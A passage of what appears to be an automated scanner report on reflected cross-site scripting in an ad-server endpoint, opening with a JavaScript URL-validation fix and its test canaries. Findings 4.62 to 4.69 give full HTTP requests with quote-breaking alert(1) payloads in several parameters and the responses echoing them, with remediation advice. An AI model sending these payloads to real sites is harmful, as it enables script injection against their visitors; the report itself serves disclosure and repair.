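  const seen = new Set();
  const out = [];
  for (const part of url.slice(q + 1).split("&")) {
    const eq = part.indexOf("=");
    const name = eq === -1 ? part : part.slice(0, eq);
    const raw = eq === -1 ? null : part.slice(eq + 1);
    if (name === "" || seen.has(name)) return null;
    seen.add(name);
    if (FLAGS.has(name)) {
      if (raw !== null) return null;
      out.push(name);
      continue;
    }
    const grammar = ALLOWED.get(name);
    if (grammar === undefined || raw === null) return null;
    let value;
    try { value = decodeURIComponent(raw); } catch (e) { return null; }
    if (!grammar.test(value)) return null;
    out.push(name + "=" + encodeURIComponent(value).replace(/%2F/g, "/"));
  }
  return CLICK_BASE + "?" + out.join("&");
}

// Constructed inputs: the click URL from the 4.54 request, then the canaries
// from 4.54 (ad), 4.60 (invented parameter name) and 4.58 (goto), plus a
// percent-encoded variant that decodes to a quote.
const GOOD =
  CLICK_BASE + "?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd" +
  "&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90" +
  "&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=";
const BAD_AD   = GOOD.replace("dart728x90&", "dart728x908a918'-alert(1)-'8a98d61d702&");
const BAD_NAME = GOOD + "&89feb'-alert(1)-'01cc9048b49=1";
const BAD_GOTO = GOOD + "a3039'-alert(1)-'e3d745f63fd";
const BAD_ENC  = GOOD.replace("pos=TopAd", "pos=TopAd%27-alert(1)-%27");

console.log(rebuildClickUrl(GOOD) === GOOD,                                // true
            [BAD_AD, BAD_NAME, BAD_GOTO, BAD_ENC].map(rebuildClickUrl));   // [ null, null, null, null ]
```

Because the rebuilt URL is assembled from validated pieces rather than copied from the request, the reflected string can only ever contain characters from the grammars above, and a request that fails validation can be served an ad without the click macro instead of an ad with attacker-controlled script.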

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=&48d43"-alert(1)-"5168faf1b2a=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:18:41 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6741

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:15 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=&48d43"-alert(1)-"5168faf1b2a=1http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996802;");
var fscUrl = url;
var fscUrlClickTagFound = false;
v
...[SNIP]...

4.62. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [opzn&page parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.14

Issue detail

The value of the opzn&page request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 996c3"-alert(1)-"92317d430a2 was submitted in the opzn&page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it cannot be avoided, any value placed inside a JavaScript string literal should be encoded for that context, for example by hex-escaping every non-alphanumeric character as \xHH or \uHHHH so that no quote character, backslash, line break or closing script tag survives unescaped; a value the script then writes into HTML, such as the href inside the document.write() markup in this response, must additionally be encoded for the HTML attribute context before the JavaScript encoding is applied.

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook996c3"-alert(1)-"92317d430a2&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:16:41 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:15 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
0%3B0%3B63131104%3B3454-728/90%3B41996802/42014589/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt160964A265019%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook996c3"-alert(1)-"92317d430a2&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=http://newsroom.intel.com/commu
...[SNIP]...

4.63. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [opzn&page parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.14

Issue detail

The value of the opzn&page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e3f05'-alert(1)-'f00d86fef5b was submitted in the opzn&page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it cannot be avoided, any value placed inside a JavaScript string literal should be encoded for that context, for example by hex-escaping every non-alphanumeric character as \xHH or \uHHHH so that no quote character, backslash, line break or closing script tag survives unescaped; a value the script then writes into HTML, such as the href inside the document.write() markup in this response, must additionally be encoded for the HTML attribute context before the JavaScript encoding is applied.

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbooke3f05'-alert(1)-'f00d86fef5b&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:16:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:15 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
0%3B0%3B63131104%3B3454-728/90%3B41996802/42014589/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt160964A265019%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbooke3f05'-alert(1)-'f00d86fef5b&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=http://newsroom.intel.com/commu
...[SNIP]...

4.64. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [pos parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.14

Issue detail

The value of the pos request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28c19"-alert(1)-"574e3fb75c9 was submitted in the pos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it cannot be avoided, any value placed inside a JavaScript string literal should be encoded for that context, for example by hex-escaping every non-alphanumeric character as \xHH or \uHHHH so that no quote character, backslash, line break or closing script tag survives unescaped; a value the script then writes into HTML, such as the href inside the document.write() markup in this response, must additionally be encoded for the HTML attribute context before the JavaScript encoding is applied.

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd28c19"-alert(1)-"574e3fb75c9&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:16:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:15 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
131104%3B3454-728/90%3B41996802/42014589/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt160964A265019%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd28c19"-alert(1)-"574e3fb75c9&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=http://newsroom.intel.com/community/intel
...[SNIP]...

4.65. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [pos parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.14

Issue detail

The value of the pos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7ae75'-alert(1)-'db690faebc3 was submitted in the pos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it cannot be avoided, any value placed inside a JavaScript string literal should be encoded for that context, for example by hex-escaping every non-alphanumeric character as \xHH or \uHHHH so that no quote character, backslash, line break or closing script tag survives unescaped; a value the script then writes into HTML, such as the href inside the document.write() markup in this response, must additionally be encoded for the HTML attribute context before the JavaScript encoding is applied.

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd7ae75'-alert(1)-'db690faebc3&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:16:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:15 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
131104%3B3454-728/90%3B41996802/42014589/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt160964A265019%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd7ae75'-alert(1)-'db690faebc3&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=http://newsroom.intel.com/community/intel
...[SNIP]...

4.66. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [sn1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.14

Issue detail

The value of the sn1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2cd16'-alert(1)-'78a5aad6cc9 was submitted in the sn1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it cannot be avoided, any value placed inside a JavaScript string literal should be encoded for that context, for example by hex-escaping every non-alphanumeric character as \xHH or \uHHHH so that no quote character, backslash, line break or closing script tag survives unescaped; a value the script then writes into HTML, such as the href inside the document.write() markup in this response, must additionally be encoded for the HTML attribute context before the JavaScript encoding is applied.

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b42cd16'-alert(1)-'78a5aad6cc9&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:18:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:15 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
o&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b42cd16'-alert(1)-'78a5aad6cc9&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996802;\">
...[SNIP]...

4.67. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [sn1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.14

Issue detail

The value of the sn1 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d645f"-alert(1)-"28e168298f6 was submitted in the sn1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it cannot be avoided, any value placed inside a JavaScript string literal should be encoded for that context, for example by hex-escaping every non-alphanumeric character as \xHH or \uHHHH so that no quote character, backslash, line break or closing script tag survives unescaped; a value the script then writes into HTML, such as the href inside the document.write() markup in this response, must additionally be encoded for the HTML attribute context before the JavaScript encoding is applied.

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4d645f"-alert(1)-"28e168298f6&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:18:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:15 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
o&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4d645f"-alert(1)-"28e168298f6&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996802;");
var fscUrl = url;
var fscUrlClickTagFound = fals
...[SNIP]...

4.68. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [sn2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.14

Issue detail

The value of the sn2 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1cb77"-alert(1)-"c68a3f4ad51 was submitted in the sn2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it cannot be avoided, any value placed inside a JavaScript string literal should be encoded for that context, for example by hex-escaping every non-alphanumeric character as \xHH or \uHHHH so that no quote character, backslash, line break or closing script tag survives unescaped; a value the script then writes into HTML, such as the href inside the document.write() markup in this response, must additionally be encoded for the HTML attribute context before the JavaScript encoding is applied.

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a63713991cb77"-alert(1)-"c68a3f4ad51&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:17:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:15 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
ttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a63713991cb77"-alert(1)-"c68a3f4ad51&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996802
...[SNIP]...

4.69. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [sn2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.14

Issue detail

The value of the sn2 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb377'-alert(1)-'9e6b8a939e3 was submitted in the sn2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it cannot be avoided, any value placed inside a JavaScript string literal should be encoded for that context, for example by hex-escaping every non-alphanumeric character as \xHH or \uHHHH so that no quote character, backslash, line break or closing script tag survives unescaped; a value the script then writes into HTML, such as the href inside the document.write() markup in this response, must additionally be encoded for the HTML attribute context before the JavaScript encoding is applied.

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399cb377'-alert(1)-'9e6b8a939e3&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
